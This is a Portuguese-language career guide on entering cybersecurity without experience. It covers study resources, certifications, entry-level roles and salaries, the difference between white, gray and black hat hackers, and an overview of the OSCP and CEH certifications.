Autor: Dudu

Com o rápido aumento das ameaças cibernéticas, a demanda por profissionais de segurança cibernética está em alta, com o Bureau of Labor Statistics projetando um crescimento de 33% nos empregos na área entre 2020 e 2030. Apesar dessa demanda, uma grande lacuna de talentos deixa 
milhões de vagas em segurança cibernética vagas anualmente , criando excelentes oportunidades para iniciantes. Mesmo sem experiência prévia, você pode ingressar na área por meio de autoestudo, certificações e vagas de nível inicial. Este guia orienta você nas etapas para iniciar sua carreira em segurança cibernética, seja você iniciante na área ou buscando uma mudança.

É possível entrar na área de segurança cibernética sem experiência?

Sim! Quando se trata de conseguir um emprego em segurança cibernética , os gerentes de contratação do setor de segurança cibernética se preocupam principalmente com as habilidades que você possui e as certificações que você concluiu. Se você possui as habilidades técnicas, as habilidades interpessoais, uma qualificação em forense digital ou como Hacker Ético Certificado ou um diploma em ciência da computação e disposição para aprender, você pode encontrar empregos de nível básico em segurança cibernética e entrar no mundo da segurança cibernética.

Como iniciar uma carreira em segurança cibernética sem experiência

Você ainda pode obter formação em segurança cibernética sem um diploma universitário. Veja como isso funciona.

1. Comece com um curso online

Um curso online de segurança cibernética é um ótimo ponto de partida. Não é tão caro quanto um diploma universitário e abrange tudo o que você precisa saber sobre segurança cibernética e segurança da informação. Você também terá suporte profissional e acesso a mentores que podem ajudá-lo a encontrar um emprego na área.

2. Familiarize-se com os fundamentos

Se você é completamente novo nesta área, precisará começar do zero. Isso significa estudar as técnicas que engenheiros de segurança cibernética usam para proteger a rede e os dados de suas empresas. Aqui, listaremos as principais áreas nas quais você precisará adquirir conhecimento:

Confidencialidade, Integridade, Disponibilidade (Tríade da CIA)A tríade da CIA é um modelo que descreve os três elementos mais fundamentais de uma política de segurança eficaz. Confidencialidade refere-se às regras que restringem o acesso à informação, integridade garante a confiabilidade da informação e disponibilidade garante que as pessoas que precisam da informação tenham acesso a ela.Gestão de RiscosFraquezas não podem ser tratadas até que sejam identificadas. Gestão de riscos refere-se ao processo de identificar, analisar e monitorar potenciais riscos de segurança.Segurança de Dados e RedeUm termo abrangente para os sistemas de tecnologia da informação que protegem a rede e os dados de uma empresa contra possíveis violações. Pode se referir tanto a software quanto a hardware, além dos protocolos implementados para restringir e acessar dados.Controle de SegurançaControle de segurança é o termo usado para descrever uma medida que visa proteger a confidencialidade e a integridade de um conjunto de dados.Avaliação de Ameaças e VulnerabilidadesIsso se refere à análise dos sistemas de uma empresa para determinar vulnerabilidades e identificar áreas de alta ameaça.RecuperaçãoRecuperação refere-se aos procedimentos usados ​​para restaurar dados perdidos ou comprometidos durante um ataque ou falha do sistema. A remediação requer pessoal qualificado.

3. Aproveite os recursos online

A internet é um tesouro de recursos para estudantes de segurança cibernética. O conhecimento adicional que você pode adquirir estudando segurança cibernética por conta própria pode realmente diferenciá-lo daqueles que apenas concluem os cursos obrigatórios.

Cursos

• Curso gratuito de segurança cibernética da Springboard
• Introdução à Cibersegurança pela edX
• Introdução à TI e Segurança Cibernética pela Cybray
• Segurança de Sistemas de Computadores pelo MIT
• Curso gratuito de treinamento em segurança cibernética Cyber ​​Aces da Sans

Blogs, podcasts e vídeos do YouTube

• CSO Online : Um blog de segurança cibernética.
• The Last Watchdog : postagens de blog e podcasts sobre tópicos de segurança cibernética.
• The Hacker News : Um site que cobre os últimos ataques cibernéticos e malware.
• John Hammond : Um canal do YouTube que aborda tópicos de segurança cibernética.

Comunidades Online

• TryHackMe: Um servidor Discord para compartilhar recursos de segurança cibernética, com mais de 140.000 membros.
• Netsec Focus : Uma comunidade online para profissionais e entusiastas de segurança cibernética para compartilhar conhecimento e experiências.
• TrustedSec : Um canal público do Slack para entusiastas de segurança cibernética.

4. Encontre uma especialização e um caminho de carreira ideal

A tecnologia é usada por empresas em todos os países e na maioria dos setores, o que significa que há muitos lugares onde você pode ingressar como profissional e muitas vagas para iniciantes.

Pesquisar o tipo de trabalho que você quer fazer e em que tipo de empresa você quer fazê-lo é um passo crucial na sua jornada para entrar no setor.

Leitura relacionada: 5 carreiras em segurança cibernética que valem a pena investigar em 2024

5. Complete um Bootcamp

Diplomas universitários não são a única forma de educação aceita no setor de tecnologia. Cada um tem suas próprias preferências de aprendizado, e não há problema em seguir o caminho que funciona para você enquanto se prepara para se tornar um especialista em segurança.

Uma alternativa popular à faculdade é optar por bootcamps de segurança cibernética online. 

Um bom bootcamp de segurança cibernética para iniciantes será ministrado por profissionais do setor e pode transformar entusiastas de segurança cibernética de iniciantes a graduados prontos para o mercado de trabalho em questão de meses. Você pode começar um emprego de nível básico após concluir um bootcamp, o que o torna ideal para iniciantes.

6. Obtenha uma certificação

As certificações fornecem um padrão de conhecimento sobre os aspectos técnicos do trabalho e habilidades que são muito úteis para as empresas durante o processo de contratação. No setor de segurança cibernética , as certificações são particularmente importantes, e muitos empregos bem remunerados exigem certas certificações além da formação acadêmica, por exemplo, em sistemas de informação, gerenciamento de segurança de rede ou computação em nuvem.

Para funções júnior e intermediária, recomendamos estas três certificações de segurança cibernética para iniciantes:Certificações de Segurança Cibernética

▲Visão geral

▲CompTIA Security+A certificação

CompTIA Security+ verifica suas habilidades nos fundamentos da segurança cibernética e confirma sua capacidade de prosperar em uma função profissional. Ela é reconhecida globalmente e bastante conhecida — você provavelmente a verá muitas vezes durante sua busca por emprego. A certificação inclui uma seção de desempenho que testa suas habilidades práticas.Certificação GIAC Security Essentials (GSEC)A certificação

GIAC Security Essentials exige que os candidatos demonstrem qualificação para uma função profissional em segurança cibernética. O exame utiliza a plataforma de testes original do GIAC, CyberLive, que cria um ambiente prático e real para testes práticos.Certificado de Fundamentos de Segurança Cibernética (ISACA)Este

Certificado de Fundamentos de Segurança Cibernética da ISACA oferece um curso on-line opcional que ensina as habilidades e o conhecimento necessários para passar no exame final.

7. Ganhe experiência prática

A experiência prática é extremamente valiosa tanto para o seu desenvolvimento como profissional de segurança cibernética quanto para o seu currículo. No entanto, a experiência prática não precisa ser remunerada. 

• Trabalho voluntário . Existem muitas outras maneiras de praticar suas habilidades de segurança cibernética em um ambiente real e colaborativo. Em um mundo onde a segurança cibernética é necessária para muitos, mas nem todos têm acesso a ela, projetos de voluntariado são fáceis de encontrar. Existem até organizações que fornecem segurança cibernética gratuitamente para instituições de caridade que não podem arcar com os custos. 
• Faça um estágio . Um estágio é uma maneira ideal de adquirir experiência prática antes do seu primeiro emprego em segurança cibernética. Às vezes, pode ser difícil encontrá-lo, então certifique-se de consultar sites como Indeed e Glassdoor com frequência enquanto você avança na sua formação.  
• Trabalhe em projetos independentes . Projetos de segurança cibernética de código aberto são uma ótima maneira de praticar e desenvolver suas habilidades. Projetos de alto nível podem até ser incluídos no seu currículo, pois os entrevistadores provavelmente também terão experiência com eles.
• Crie um portfólio . Um portfólio é uma ferramenta útil para conseguir entrevistas sem experiência. É melhor criá-lo com o tempo, por isso recomendamos que você comece seus projetos de portfólio de segurança cibernética o mais rápido possível. Inclua estudos de caso que destaquem como você lidaria com violações de segurança em nível organizacional ou demonstre seu conhecimento em segurança com um whitepaper.

8. Encontre um mentor

Não existe uma maneira certa de encontrar um mentor, e uma mentoria valiosa também não precisa ser oficial.

Seja por meio de um estágio ou de uma escola, encontrar um profissional qualificado e disposto a responder às suas perguntas será altamente benéfico para o seu desenvolvimento.

9. Construa uma rede forte

Uma boa rede pode fornecer valor infinito, incluindo futuras oportunidades de emprego.

• O LinkedIn é uma ferramenta crucial para a construção de networking. Independentemente de quem você conhece ou como, enviar um convite para se conectar no LinkedIn é sempre apropriado.
• Comunidades e conferências. Aproveite eventos e conferências de segurança cibernética, tanto online quanto presenciais, com grande número de profissionais reunidos. Aqui está uma lista de algumas das principais plataformas de conferências de segurança cibernética online para ajudar você a começar.
  • A Infosec-Conferences oferece um diretório abrangente com listas meticulosamente atualizadas e verificadas contra spam dos principais eventos de segurança cibernética do mundo. Abrangendo conferências, reuniões, seminários e eventos deste ano e dos próximos, ela serve como um recurso valioso para profissionais, executivos e entusiastas de segurança cibernética.
  • A Cyber ​​Events oferece uma seleção criteriosa de eventos de segurança cibernética, abrangendo vários tópicos, como perícia digital, análise de malware e resposta a incidentes, oferecendo aos participantes a oportunidade de aprofundar sua compreensão dos desafios e soluções de segurança cibernética por meio de sessões e workshops conduzidos por especialistas.
  • O Security Conference Finder simplifica o processo de encontrar conferências de segurança cibernética confiáveis ​​no mundo todo, permitindo que os participantes se mantenham informados sobre os desenvolvimentos do setor, se conectem com líderes de pensamento e troquem ideias sobre problemas e soluções críticas de segurança.

Como conseguir um emprego e começar a trabalhar em segurança cibernética

Entrar na área de segurança cibernética pode parecer desafiador, mas aqui estão algumas etapas que ajudam as pessoas a conseguirem seu primeiro emprego, mesmo sem experiência:

• Ignore a maioria das descrições de cargos : muitos empregos de nível básico exigem de 2 a 3 anos de experiência por padrão. Candidate-se mesmo assim se você atender a pelo menos 60 a 70% das qualificações.
• Escolha um caminho e crie um laboratório em casa : concentre-se em uma função de nível básico, como analista de SOC ou suporte de TI. Em seguida, crie um laboratório em casa usando plataformas como TryHackMe, Hack The Box, pfSense ou ambientes AD/Windows para praticar.
• Documente o que você faz : Crie relatórios para CTFs, projetos ou ferramentas que você usa. Compartilhe-os no GitHub, LinkedIn ou em um blog. Isso demonstra iniciativa e comprova suas habilidades práticas.
• Consiga um emprego “iniciante” : considere funções adjacentes à segurança cibernética, como help desk, suporte de TI ou administrador de rede. Muitos profissionais começam aqui antes de fazer a transição para a segurança.
• Adapte seu currículo : liste ferramentas, laboratórios ou plataformas específicas com as quais você trabalhou (como Wireshark, Splunk ou Kali Linux). Use verbos de ação, quantifique as conquistas e alinhe seu currículo com a vaga.
• Candidate-se loucamente : defina uma meta semanal de candidatura — algumas pessoas se candidataram a 300 a 500 vagas antes de conseguirem a primeira. Use ferramentas para monitorar e organizar.
• Use grandes MSPs ou MSSPs para entrar : esses provedores de serviços gerenciados/segurança geralmente têm maior rotatividade e menores barreiras de entrada, o que os torna excelentes plataformas de lançamento.
• Solicite entrevistas informativas : envie mensagens para profissionais em cargos juniores no LinkedIn. Pergunte como eles foram contratados e se analisariam seu currículo ou portfólio.
• Candidate-se mesmo se ainda estiver estudando : comece a adquirir experiência enquanto estuda, por meio de estágios, voluntariado ou trabalhos freelance. Muitos empregadores estão abertos a treinar candidatos em início de carreira que demonstrem garra.

Empregos de nível básico em segurança cibernética que você pode conseguir sem qualquer experiência

A cibersegurança oferece muitos pontos de entrada, mesmo para quem não tem experiência prévia ou educação formal. Aprendizagem e certificações por iniciativa própria podem ajudar, mas começar com funções gerais que abrangem uma ampla gama de habilidades é uma ótima maneira de ingressar na área. Aqui estão algumas das principais vagas de nível básico para iniciantes:

Cargo	Descrição	Habilidades essenciais	Salário médio
Analista de Segurança da Informação	Monitora e protege dados e sistemas da empresa, analisando ameaças à segurança e gerenciando controles de acesso.	Análise, segurança na nuvem, trabalho em equipe	US$ 77 mil por ano
Analista/Respondente de Incidentes	Monitora alertas, investiga incidentes e ajuda a prevenir futuras violações.	CompTIA Security+, gerenciamento de estresse, resposta a incidentes	US$ 62 mil por ano
Auditor de TI	Garante que as empresas cumpram os padrões do setor, prepara-se para auditorias e redige relatórios.	Análise, comunicação, elaboração de relatórios	US$ 79 mil por ano
Testador de Penetração Júnior	Testa sistemas em busca de vulnerabilidades simulando ataques cibernéticos.	Resolução de problemas, engenharia reversa, atenção aos detalhes	US$ 80 mil por ano
Especialista em Conscientização e Treinamento em Segurança	Desenvolve e oferece programas de treinamento para ajudar os funcionários a reconhecer e mitigar os riscos de segurança cibernética.	Comunicação, design instrucional	N / D

Iniciando sua segurança cibernética: dicas para o sucesso

Interessado em uma carreira em segurança cibernética? Aqui estão cinco dicas para profissionais de segurança cibernética iniciantes ou em busca de vagas de nível básico.

• Decida que tipo de carreira em segurança cibernética você deseja.  O primeiro passo é decidir que tipo de carreira você deseja! Cargos de nível básico em segurança cibernética são geralmente semelhantes, e você pode se concentrar em proteger informações confidenciais contra ameaças cibernéticas, aprender sobre segurança de redes, gerenciamento de riscos ou gerenciar o acesso da sua empresa. Depois de adquirir experiência prática em empregos de nível básico, uma ampla gama de opções estará disponível para sua nova carreira. Desenvolva suas habilidades em segurança cibernética de acordo com isso. 
• Decida onde você quer trabalhar. A profissão de segurança cibernética abre um mundo de possibilidades. Você quer trabalhar como profissional de segurança cibernética em agências de segurança pública ou empresas privadas? Você quer ser um testador de penetração? Um profissional certificado em segurança de sistemas de informação ou outros empregos bem remunerados? Muitos empregadores procuram novos talentos que atendam a critérios específicos, como as habilidades certas em segurança cibernética, um diploma de bacharel em ciência da computação, habilidades sociais, habilidades técnicas ou mais. Certifique-se de ter as habilidades certas de que precisa. 
• Obtenha uma qualificação ou certificação em segurança cibernética. Ter uma qualificação em segurança cibernética lhe dá acesso a muitas outras vagas de emprego bem remuneradas em segurança cibernética ou em áreas relacionadas. Se você tiver a experiência profissional adequada, já deu os primeiros passos para obter a certificação/qualificação. Você pode optar pelo autodidatismo, obter um diploma em ciência da computação ou conversar com gerentes de contratação sobre um estágio. Uma das melhores maneiras de conseguir um emprego em tempo integral na área é participar de um bootcamp — alguns até o apresentarão a um possível empregador!
• Encontre maneiras de continuar aprendendo . Converse com um mentor, participe de um fórum ou siga o caminho da autoaprendizagem. É importante continuar evoluindo e aprendendo nesta área. 
• Não desista. Você pode não conseguir seu primeiro emprego imediatamente, mas haverá outras candidaturas, outras oportunidades e mais opções se você continuar trabalhando em sua carreira em segurança cibernética. Lembre-se: engenheiros de segurança cibernética estão em alta demanda. Você encontrará algo em breve!

O que um analista de segurança cibernética faz?

Um analista de segurança cibernética projeta sistemas de segurança da informação, protocolos e outras medidas de proteção para impedir ataques cibernéticos antes que eles aconteçam.

Além de identificar vulnerabilidades de rede por meio de análises de vulnerabilidades e riscos, os analistas de segurança cibernética também treinam outros funcionários em boas práticas de segurança. Criminosos podem ter como alvo funcionários e se aproveitar de sua falta de conhecimento (por exemplo, o uso de um sistema operacional de código aberto sem patches) para realizar ataques cibernéticos a sistemas de computador, por isso é importante garantir que todos na organização entendam os fundamentos. Dados confidenciais são roubados todos os dias, e é por isso que essa carreira específica em segurança cibernética está ganhando força . Assim que ocorre uma violação, outros membros da equipe de segurança cibernética auxiliam na investigação e na remediação.

Quando você pensa em um “hacker”, provavelmente inconscientemente imagina um homem misterioso encapuzado, usando óculos escuros, cercado por telas iluminadas repletas de códigos, em um quarto escuro, certo? Ao contrário da crença popular, há muito mais no mundo do hacking cibernético do que aquilo que vemos nas telas.

Do roubo, alteração e destruição de informações à proteção do espaço digital das organizações, existem vários níveis de hacking — bons e ruins — e muitas nuances entre eles. Seja você um profissional em segurança cibernética ou uma organização que deseja aprender mais sobre como proteger seus negócios da lamentável prevalência de violações de dados, aqui está tudo o que você precisa saber sobre hacking bom e ruim. 

Quão importante é o hacking — e qual é seu impacto?

A cibersegurança é uma questão global e crescente. De acordo com o Tech Jury, um ataque cibernético ocorre a cada 39 segundos . Considere as seguintes estatísticas ao avaliar a gravidade e o impacto do hacking:

• Trinta mil invasões de sites ocorrem todos os dias , de acordo com o Tech Jury. 
• Os ataques de ransomware estão aumentando em 400% ano a ano , de acordo com o IT Chronicles. 
• Mais de 25.000 aplicativos maliciosos são detectados diariamente e posteriormente bloqueados.
• 70% de todas as violações de dados globais são causadas por motivos financeiros . Anualmente, o custo do crime cibernético é de US$ 1,5 trilhão em todo o mundo. 
• Em 2020, as violações de dados de saúde nos EUA aumentaram 25% em relação ao ano anterior. 
• Desde 2019, o FBI registrou um aumento de 69% nos ataques relacionados a crimes cibernéticos . 
• De acordo com a IBM, o custo das violações de dados nos Estados Unidos atingiu um novo recorde, com uma média de custo total de US$ 4,35 milhões em 2022 — um aumento de 12,7% em relação a 2020.

A crescente prevalência de violações de dados é inegável. E, infelizmente, seu impacto é sentido em organizações — grandes e pequenas — em todos os cantos do mundo. De acordo com um 
estudo de 2016 do Centro de Estudos Estratégicos e Internacionais (CSIS) , 82% dos entrevistados admitem não ter habilidades em segurança cibernética em suas organizações e 71% reconhecem que essa lacuna de habilidades torna suas organizações mais vulneráveis ​​a ameaças externas. 

Outro estudo de 2021-22 conduzido pela IBM , que entrevistou mais de 3.600 indivíduos de organizações impactadas por violações de dados, chegou às seguintes conclusões:

• 45% das violações de dados ocorreram na nuvem.
• 83% das organizações sofreram mais de uma violação de dados.
• 60% das violações de dados forçaram as organizações a aumentar seus preços para o consumidor.
• Em média, levou 277 dias para identificar e conter uma violação de dados. 

O que é “hacking”?

De acordo com o Economic Times , hacking se refere à ação de obter controle de um sistema de computador ou de uma rede privada dentro de um computador. 

No entanto, para entender verdadeiramente como o hacking funciona, é importante primeiro entender os diferentes tipos de hackers e as intenções por trás de suas habilidades — boas e ruins. Ao falar sobre hackers, eles costumam ser categorizados em três grupos principais:

• White hats — Uma organização frequentemente emprega esses hackers para verificar e testar seus sistemas de segurança para garantir que eles dificilmente serão hackeados por fontes externas. 
• Black hats — São os hackers que você vê nos filmes. Eles obtêm acesso não autorizado aos sistemas de pessoas ou organizações para ganho pessoal. 
• Gray hats — Este grupo é conhecido como hackers curiosos. Geralmente, eles buscam brechas para hackear um sistema de segurança de rede. No entanto, ao contrário dos black hats, eles não operam para ganho pessoal. Esse tipo de hacker alerta o administrador (ou seja, a organização) sobre a vulnerabilidade, permitindo que ele a corrija internamente.

Chapéus pretos, cinzas e brancos: os diferentes tipos de hackers explicados

Hackers de chapéu branco

O que são hackers white hat?

Hackers white hat, também conhecidos como hackers éticos ou hackers do bem, praticam uma forma legal de hacking, na qual são contratados por uma organização ou empresa para identificar falhas de segurança e fazer recomendações de melhorias. Ao contrário dos hackers black hat, suas intenções se concentram em fortalecer a rede de segurança para evitar potenciais ameaças. 

O que os hackers white hat fazem?

Basicamente, o trabalho deles é identificar vulnerabilidades do sistema para evitar violações de segurança. Eles conseguem isso tentando imitar o que um hacker mal-intencionado (black hat) faria. Muitas vezes, isso inclui o seguinte processo:

• Pesquisa — Eles tentarão identificar pontos de vulnerabilidade no programa ou na tecnologia. Isso pode ser feito manualmente ou por meio de um processo automatizado. 
• Documento — Procure entender como a vulnerabilidade pode ser explorada. 
• Discuta — Muitas vezes, eles fornecerão uma análise detalhada dos pontos problemáticos e soluções. 

É importante observar que, para que o hacking seja considerado ético e legal, o hacker precisa da permissão do proprietário do sistema para obter acesso à sua rede e identificar possíveis pontos fracos. 

Como os hackers white hat trabalham?

Existem diversas habilidades e testes que hackers white hat utilizam para testar a força de um sistema de segurança. Como eles tentam imitar o que um hacker black hat faria, eles podem incluir um ou mais dos seguintes, de acordo com a Kaspersky :

• Engenharia social — Também conhecida como “hacking de pessoas”, refere-se a enganar e manipular vítimas para que façam algo que não deveriam, a fim de testar as fragilidades das defesas humanas de uma organização. Isso pode incluir o compartilhamento de credenciais de login ou a realização de uma transferência bancária. 
• Teste de penetração — Envolve a identificação de possíveis fraquezas nas defesas de segurança de uma empresa e a correção das vulnerabilidades. 
• Pesquisa — Refere-se à pesquisa de uma empresa para identificar fragilidades na infraestrutura física e de TI. Hackers buscam maneiras de contornar os controles de segurança sem interferir ou violar nada legalmente. 
• Programação — Hackers bonzinhos criam honeypots, com o objetivo de atrair hackers malvados para distraí-los ou coletar informações valiosas sobre eles. Hackers bonzinhos sacrificam o sistema computacional para ajudar a atrair hackers malvados. 

Embora hackers bons e ruins tenham o mesmo conjunto de habilidades, eles diferem em suas intenções. Assim, embora ambos visem contornar as defesas de um sistema, um hacker ético tem pouco interesse em tirar proveito das vulnerabilidades para ganho pessoal. Em vez disso, eles visam ajudar a identificar e corrigir essas fraquezas. 

Hackers de chapéu cinza

O que são hackers gray hat?

Quando se trata de segurança cibernética, não é preto no branco. Como o nome sugere, hackers de chapéu cinza

situam-se em algum lugar entre os hackers bons e os maus. Muitos hackers gray hat optam por hackear sistemas e redes como hobby ou para identificar vulnerabilidades e alertar o proprietário sobre potenciais riscos de segurança. Ao contrário dos hackers black hat, geralmente há pouco interesse em ganho pessoal, embora a linha possa ser facilmente cruzada.  

O que os hackers gray hat fazem?

Embora as intenções dos hackers gray hat sejam geralmente boas e visem fornecer informações valiosas às empresas, é importante observar que suas ações são tecnicamente ilegais e muitos hackers white hat consideram seus métodos antiéticos. Da mesma forma, não é incomum que hackers gray hat migrem para hackers black hat quando surge uma oportunidade. 

A motivação é a principal diferença entre um hacker black hat e um hacker gray hat. Enquanto os hackers black hat são egoístas e buscam ganho pessoal, os motivos dos hackers gray hat são intrigantes. Embora a motivação varie de pessoa para pessoa, muitos categorizam suas intenções em um ou mais dos seguintes grupos:

• Eles sentem o dever social de tornar a internet mais segura para indivíduos e organizações. 
• A curiosidade toma conta deles, e eles querem o desafio de hackear um sistema de alto nível. 
• Eles querem mostrar suas habilidades ou ganhar publicidade. 

Como os hackers gray hat trabalham?

Hackers gray hat utilizam um ou uma combinação dos métodos utilizados por hackers white hat para identificar problemas e fazer recomendações. Frequentemente, eles encontram pontos fracos e alertam a organização sobre os problemas. 

No entanto, dependendo da ética do hacker gray hat, isso nem sempre acontece. Caminhando na tênue linha entre ser um super-herói silencioso e colocar as empresas em maior risco, existem muitos tons de cinza quando se trata de hackers gray hat. Isso inclui: 

1. Recomendar correções — O hacker gray hat pode alertar a organização sobre as vulnerabilidades e fornecer uma lista de recomendações para corrigir o problema. Em alguns casos, ele pode oferecer seus serviços por uma pequena taxa. No entanto, isso é menos comum agora, pois as empresas estão mais propensas a processar hackers por suas atividades ilegais. 
2. Programas de recompensa por bugs — Muitas organizações estão cientes dos riscos que hackers representam para sua segurança geral. Por isso, muitas empresas maiores utilizam programas de recompensa por bugs, nos quais pagam uma recompensa por qualquer vulnerabilidade detectada por um hacker. Isso reduz o risco de hackers explorarem suas vulnerabilidades ou alertarem publicamente outros hackers sobre os problemas. 
3. Anúncio público — Em certas situações, alguns hackers gray hat podem publicar publicamente as fragilidades da organização, expondo-a a potenciais ataques cibernéticos por parte de vários hackers black hat. Embora sua intenção possa não ser maliciosa, isso expõe a empresa a um risco maior de ataques por parte de pessoas antiéticas em suas práticas. 

Hackers de chapéu preto 

O que são hackers black hat?

Hackers black hat, também conhecidos como hackers ruins, praticam atividades ilegais de hacking motivados por ganhos pessoais — desde financeiros e políticos até vingança. Hackers black hat geralmente trabalham sozinhos ou para unidades do crime organizado. 

O que os hackers black hat fazem?

Em termos simples, hackers black hat, ou hackers mal intencionados, invadem redes de segurança de computadores sem autorização para causar danos. A extensão do hacking black hat é variada — desde a liberação de malware para destruir arquivos, a manutenção de sistemas como reféns, o roubo de senhas e a retenção de informações pessoais, como números de cartão de crédito. Dadas as implicações legais de seu trabalho, os hackers black hat se esforçam ao máximo para permanecer anônimos — o que aumenta a natureza misteriosa do hacking. 

Como os hackers black hat trabalham?

Os ataques cibernéticos variam em gravidade e podem se apresentar de diversas formas. De acordo com a Dataprot , aqui estão algumas das formas mais comuns de hacking conduzidas por hackers black hat:

• Phishing — Isso envolve hackers maliciosos enviando e-mails se passando por empresas com as quais a vítima tem vínculos (por exemplo, sua instituição bancária). Geralmente, as vítimas são induzidas a clicar em um link malicioso que coleta informações confidenciais, como detalhes de login. 
• Ataque de isca e troca — Isso envolve hackers comprando espaço publicitário on-line e infectando dispositivos de pessoas quando clicados. 
• Ransomware — O ransomware bloqueia o acesso aos arquivos e ao sistema de uma pessoa. Os hackers geralmente solicitam dinheiro em troca do desbloqueio do sistema. 
• Keyloggers — Um keylogger é um tipo de software que registra cada tecla digitada por uma pessoa. Basicamente, isso permite que hackers acessem informações confidenciais, como senhas. 

Hacking bom e ruim: uma comparação lado a lado

Embora hackers bons e maus pareçam estar em extremos opostos do espectro, a realidade é que são semelhantes em natureza. Embora suas motivações sejam drasticamente diferentes, seu conjunto de habilidades e metodologia de hacking permanecem praticamente os mesmos. Vamos analisar mais de perto uma comparação lado a lado criada pela Knowledge Hut : 

Limites	Bom hacking	Hacking ruim
Motivo	Um bom hacker trabalharia com uma organização ou empresa para proteger seus dados. Isso inclui pesquisar e detectar vulnerabilidades de segurança, fornecer recomendações e corrigir falhas, além de implementar políticas de proteção de dados.	Um hacker maldoso obtém acesso não autorizado ao sistema de uma organização ou empresa para ganho pessoal — financeiro, político, vingança ou diversão.
Legalidade	Essa forma de hacking é legal, pois a organização ou empresa contratou ou contratou o hacker e lhe concedeu acesso autorizado à sua rede e tecnologia. Esta é uma das áreas mais procuradas e bem pagas atualmente.	Essa forma de hacking é ilegal, pois o hacker tenta obter acesso não autorizado à rede de um sistema para causar danos pessoais. Há consequências graves em caso de condenação.
Ferramentas	Hackers éticos usam as mesmas ferramentas que os hackers ruins para identificar vulnerabilidades e potenciais fraquezas	Hackers mal-intencionados usam as mesmas ferramentas que hackers éticos para explorar essas vulnerabilidades para ganho pessoal.
Treinamento	Hackers éticos geralmente têm o mesmo treinamento e conjunto de habilidades que os hackers ruins. Hackers bons podem optar por obter certificações adicionais para comprovar sua intenção, como a certificação Certified Ethical Hacker (CEH).	Hackers ruins geralmente têm o mesmo treinamento e conjunto de habilidades que hackers éticos.

Uma carreira em hacking ético e segurança cibernética — quais habilidades são necessárias?

Com a crescente demanda por profissionais de segurança cibernética qualificados, empresas e organizações reconhecem que talentos qualificados vêm de diversas esferas da vida e diferentes trajetórias de carreira. O que isso significa? Não existe uma abordagem única para ingressar na força de trabalho em segurança cibernética. Enquanto algumas pessoas acabam em carreiras relacionadas à segurança cibernética por meio de diplomas universitários específicos, outras chegam por meio do autoaprendizado e de habilidades transferíveis. 

Vamos analisar mais de perto quais habilidades são necessárias para ser um hacker ético:

Habilidades técnicas de um hacker ético:	Habilidades sociais de hackers éticos:
Experiência em linguagens de programação (por exemplo, Python, SQL, C++, Java, C, Ruby, JavaScript, Perl, PHP, etc.)	Comunicação
Proficiência em sistemas operacionais	Resolução de problemas
Conhecimento prático aprofundado de redes	Pensamento crítico
Proficiente em princípios de segurança da informação	Analítico
Conhecimento de sistemas de gerenciamento de banco de dados	Organizacional
Conhecimento de plataformas, como Windows, Linux, Unix, etc.	Criatividade
Conhecimento de mecanismos de busca e servidores
Solução de problemas

Considerações finais

Não é segredo que vivemos em um período definido por tecnologia, software e dados — e as previsões sugerem que essa tendência está em ascensão. 

Com a maior dependência da tecnologia, aumenta a pressão para que as organizações encontrem métodos de qualidade, sustentáveis ​​e eficientes para proteger sua presença online. 

Entra em cena: hackers éticos. 

Da pesquisa e detecção de vulnerabilidades de segurança ao fornecimento de recomendações e correções para essas vulnerabilidades, hackers éticos estão abrindo caminho para o futuro da segurança cibernética. E as organizações têm o dever, para com sua tecnologia, de se educar sobre a diferença entre hackers bons e ruins e seus muitos sinônimos. 

Se você tem uma carreira em Segurança da Informação e está intrigado por técnicas defensivas e ofensivas, considere se tornar um Profissional Certificado em Segurança Ofensiva (OSCP) .

A certificação OSCP foi criada para demonstrar as habilidades e o conhecimento necessários para ser um testador de penetração.

É uma certificação multidimensional respeitada para profissionais de InfoSec. Em preparação para o exame, os candidatos aprendem e demonstram habilidades em testes de penetração, além de conceitos sólidos de defesa cibernética. Comece na segurança ofensiva com uma certificação em hacking éticoListagens Patrocinadas

Tornar-se um OSCP estabelece que você será um membro valioso da equipe de segurança porque tem conhecimento prático de métodos de ataque usados ​​contra infraestrutura, sistemas e dispositivos.

Os OSCPs geralmente são bem versados ​​na identificação de vulnerabilidades conhecidas e desconhecidas, incluindo erros de configuração. 

O que é uma certificação OSCP? 

OSCP é uma certificação de hacking ético oferecida pela Offensive Security (OffSec). A posse desta certificação valida o conhecimento de um profissional em metodologias de testes de penetração utilizando ferramentas inerentes à distribuição Kali Linux .

Kali é uma distribuição Linux de código aberto baseada em Debian que permite que profissionais de segurança e TI avaliem a segurança de seus sistemas.

Contratar profissionais de segurança cibernética que tenham o conhecimento necessário para implantar ferramentas e métodos maliciosos de hackers é especialmente valioso para qualquer equipe de segurança.

O conhecimento íntimo das estratégias ofensivas que provavelmente serão usadas contra seus sistemas é vital para construir uma defesa eficaz.  

Possuir uma certificação OSCP indica que o titular adquiriu habilidades essenciais necessárias para trabalhar em qualquer uma das seguintes funções, entre outras:

• Analista de segurança 
• Analista de informática forense
• Especialista em segurança
• Testador de penetração
• Engenheiro de segurança 
• Auditor de código de segurança 
• Analista de malware 
• Consultor de segurança

A crescente aceitação de certificações de segurança ofensivas no setor de segurança reforça a crença de que o hacking ético é uma profissão respeitável, não apenas uma habilidade prática. Essa aceitação criou uma demanda por um subconjunto de habilidades em computação e redes antes buscado apenas por agentes mal-intencionados. 

Qual é a diferença entre uma certificação OSCP e uma CEH?

Atualmente, existem duas certificações de teste de penetração disponíveis: a Certified Ethical Hacker ( CEH ) e a OSCP. Cada uma delas preenche uma função específica no setor de segurança cibernética, embora empregos que exigem uma dessas certificações geralmente aceitem qualquer uma delas. 

Indivíduos que possuem a certificação CEH são qualificados sob uma perspectiva neutra em relação a fornecedores. A CEH valida sua capacidade de pensar e agir como hackers maliciosos.

Esta certificação é adequada para testadores sem penetração e pessoas que não têm conhecimento detalhado de segurança, pois se concentra menos em laboratórios práticos e é considerada mais uma certificação de nível básico do que o OSCP. 

Validar profissionais de segurança da informação que estejam equipados com as habilidades e o conhecimento necessários em um domínio especializado de segurança da informação que os ajudará a evitar um conflito cibernético, caso seja necessário.

Os candidatos ao OSCP devem ser capazes de enumerar uma máquina, identificar vulnerabilidades e desenvolver soluções para produzir shells. É justo dizer que o OSCP é a certificação padrão ouro para testes de penetração.

De acordo com o Payscale , o salário médio de um CEH é de US$ 86.436, enquanto um OSCP é de US$ 102.000. 

Quais são os requisitos do exame OSCP?

Os pacotes do curso Teste de Penetração com Kali Linux (PWK/PEN-200) da OffSec incluem uma ou mais tentativas de exame. Após a conclusão do curso, ou quando o aluno se sentir pronto, poderá realizar a certificação OSCP. 

